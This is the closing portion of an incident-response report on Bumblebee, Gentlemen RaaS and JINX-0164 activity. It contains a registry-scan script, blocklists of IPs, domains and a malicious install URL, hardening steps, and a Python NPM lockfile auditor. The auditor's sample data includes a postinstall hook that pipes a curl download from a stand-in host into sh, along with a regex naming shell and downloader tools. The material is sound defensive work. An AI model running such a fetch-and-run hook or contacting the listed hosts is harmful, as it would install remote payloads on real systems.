                Write-Host " [!] SUSPICIOUS REGISTRY: $($p.Name) = $($p.Value)" -ForegroundColor Red
                Write-Host " Key: $rp" -ForegroundColor Red
                $findings++
            }
        }
    }
}

# Summary
Write-Host "`n=== SCAN COMPLETE: $findings finding(s) detected ===" -ForegroundColor $(if ($findings -gt 0) {"Red"} else {"Green"})
Write-Host "Scan End: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')`n" -ForegroundColor Cyan
if ($findings -gt 0) {
    Write-Host "[!] IMMEDIATE ACTION REQUIRED: Review all flagged items above." -ForegroundColor Red
    Write-Host "[!] Isolate affected systems and escalate to IR team." -ForegroundColor Red
} else {
    Write-Host "[+] No indicators matched. Continue monitoring." -ForegroundColor Green
}
```
---
Response Priorities
Immediate (0–4 hours)
- Block all IP and domain IOCs at firewalls, web proxies, and DNS resolvers: 172.96.137.160, 89.36.224.5, angryipscanner.org, opmanager.pro, driver-updater.net, live.ong, and all typosquatted hostnames (login.teamicrosoft.com, teams.live.us.org, www.driver-updater.net, www.live.us.org)
- Deploy file hash blocklists to EDR/SIEM across all endpoints — all 162 indicators should be ingested as high-confidence detections
- Hunt for Bumblebee execution artifacts: rundll32/regsvr32 executing from temp directories, RustDesk binaries in non-standard paths, scheduled tasks with encoded PowerShell commands
- Hunt for Gentlemen RaaS reconnaissance: active netsh trace sessions, SharpADWS executions, recent GPO modifications, network scanner deployments (NetScan, Advanced IP Scanner)
- Hunt for JINX-0164 activity: Python/Go binaries executing from temp directories on macOS endpoints, connections to 89.36.224.5, NPM post-install scripts with network calls to external domains
- Block the malicious install script URL http://89.36.224.5/troubleshoot/mac/install.sh at all web gateways and proxies
24 Hours
- Credential verification and reset: If Bumblebee or AUDIOFIX is detected, assume credential compromise — force password resets for all local admin accounts, domain admin accounts, and service accounts on affected segments. Rotate any cached credentials in LSASS
- Session token invalidation: For JINX-0164 cryptocurrency sector targets, invalidate all active session tokens for developer platforms (GitHub, GitLab, CI/CD systems, cloud consoles). Rotate API keys and deployment credentials
- RustDesk audit: Inventory all RustDesk installations organization-wide. Validate each against IT-approved software manifests. Quarantine any unauthorized instances immediately
- AD integrity check: If Gentlemen RaaS indicators are present, audit Group Policy Objects for unauthorized modifications, check for newly created GPOs, and review SYSVOL for unexpected scripts or binaries
- NPM package audit: For developer environments, scan package-lock.json files for any dependencies resolving to known malicious packages. Implement package allowlisting and verify package integrity signatures
1 Week
- SEO poisoning awareness training: Educate IT staff that Bing/Google search results for IT management tools may be poisoned. Establish an official software download portal with hash verification for tools like ManageEngine OpManager, Angry IP Scanner, and RustDesk
- VPN/firewall hardening: Patch all internet-facing VPN concentrators and firewalls to latest firmware. Implement network-level authentication (NLA) for all remote access. The Gentlemen group specifically targets these devices for initial access — review and close any externally exposed management interfaces
- GPO security hardening: Implement GPO change auditing with real-time alerting. Restrict GPO creation and modification to break-glass accounts with MFA. Deploy a GPO change monitoring solution that alerts on new GPO creation, GPO link changes, and SYSVOL modifications
- macOS endpoint hardening: For organizations with developer Mac fleets, deploy MDM-enforced application allowlisting (Gatekeeper + notarization requirements), disable automatic execution of downloaded scripts, and implement EDR coverage for macOS with LaunchAgent/LaunchDaemon persistence detection
- Supply chain controls: Implement NPM package signing and verification, pin dependency versions with integrity hashes, and deploy dependency confusion attack detection. Enforce CI/CD pipeline secret scanning and branch protection rules
- Threat intelligence integration: Subscribe to AlienVault OTX pulses for Bumblebee, The Gentlemen, and JINX-0164 threat actors. Configure automated IOC ingestion into SIEM/EDR platforms with hourly refresh cadence
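As an added example (not the report's own tooling), the Python audit below implements the NPM package audit and integrity-pinning items from the 24 Hours and 1 Week lists: it flags package-lock.json entries resolved outside an allowlisted registry or lacking an integrity hash, and package.json lifecycle hooks that spawn a shell, download or eval code at install time, which is the install-time behaviour the JINX-0164 Sigma rule looks for. The sample lockfile, package names, mirror host and install URL are constructed placeholders.

```python
import json
import re
from urllib.parse import urlparse

# Registries your organisation sanctions; anything else in a lockfile is a finding.
ALLOWED_REGISTRIES = {"registry.npmjs.org"}
# Hooks that run arbitrary code as soon as the package is pulled in.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Shell, downloader and process-spawning tells worth a human look (constructed list).
SUSPICIOUS_SCRIPT = re.compile(
    r"curl|wget|child_process|\bsh\b|\bbash\b|exec\(|spawn\(|eval\(|base64", re.IGNORECASE
)


def lock_entries(lock: dict) -> dict:
    """Normalise lockfile v2/v3 ('packages') and v1 ('dependencies') to path -> metadata."""
    packages = lock.get("packages")
    if packages:
        return {p: m for p, m in packages.items() if p}  # drop the "" root project entry
    return {f"node_modules/{n}": m for n, m in lock.get("dependencies", {}).items()}


def audit_lockfile(lock: dict, allowed=ALLOWED_REGISTRIES) -> list:
    """Flag entries resolved outside the allowlisted registries or lacking an
    integrity hash; pinning with integrity hashes is what makes a swapped tarball fail."""
    findings = []
    for path, meta in lock_entries(lock).items():
        name = path.rsplit("node_modules/", 1)[-1]  # handles nested and @scoped paths
        resolved = meta.get("resolved", "")
        host = urlparse(resolved).hostname or ""
        if resolved and host not in allowed:
            findings.append({"package": name, "issue": "off-registry-source", "detail": resolved})
        if resolved and not meta.get("integrity"):
            findings.append({"package": name, "issue": "missing-integrity", "detail": path})
    return findings


def audit_scripts(pkg: dict) -> list:
    """Flag lifecycle hooks that spawn a shell, fetch or eval code at install time."""
    return [
        {"package": pkg.get("name", "?"), "issue": f"suspicious-{hook}", "detail": cmd}
        for hook, cmd in pkg.get("scripts", {}).items()
        if hook in LIFECYCLE_HOOKS and SUSPICIOUS_SCRIPT.search(cmd)
    ]


# Constructed sample inputs: one clean entry, one off-registry mirror, one unpinned entry.
SAMPLE_LOCK = json.loads("""{
  "name": "wallet-service", "lockfileVersion": 3,
  "packages": {
    "": {"name": "wallet-service"},
    "node_modules/left-pad": {"version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
      "integrity": "sha512-CONSTRUCTED"},
    "node_modules/crypto-utils-helper": {"version": "2.0.1",
      "resolved": "https://npm-mirror.example.invalid/crypto-utils-helper/-/crypto-utils-helper-2.0.1.tgz",
      "integrity": "sha512-CONSTRUCTED"},
    "node_modules/bn-fast": {"version": "0.9.0",
      "resolved": "https://registry.npmjs.org/bn-fast/-/bn-fast-0.9.0.tgz"}
  }
}""")
SAMPLE_PKG = {
    "name": "crypto-utils-helper",
    "scripts": {
        "test": "mocha",
        "postinstall": "node -e \"require('child_process').exec('curl -s http://bad.example.invalid/install.sh | sh')\"",
    },
}


def run_audit(lock: dict = SAMPLE_LOCK, pkg: dict = SAMPLE_PKG) -> list:
    """Combined findings for one lockfile and one package manifest."""
    return audit_lockfile(lock) + audit_scripts(pkg)


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f['issue']}] {f['package']}: {f['detail']}")
```

Point `audit_scripts` at the package.json of each installed dependency (node_modules/*/package.json), not only the project's own, since the hook of interest ships inside the trojanized package.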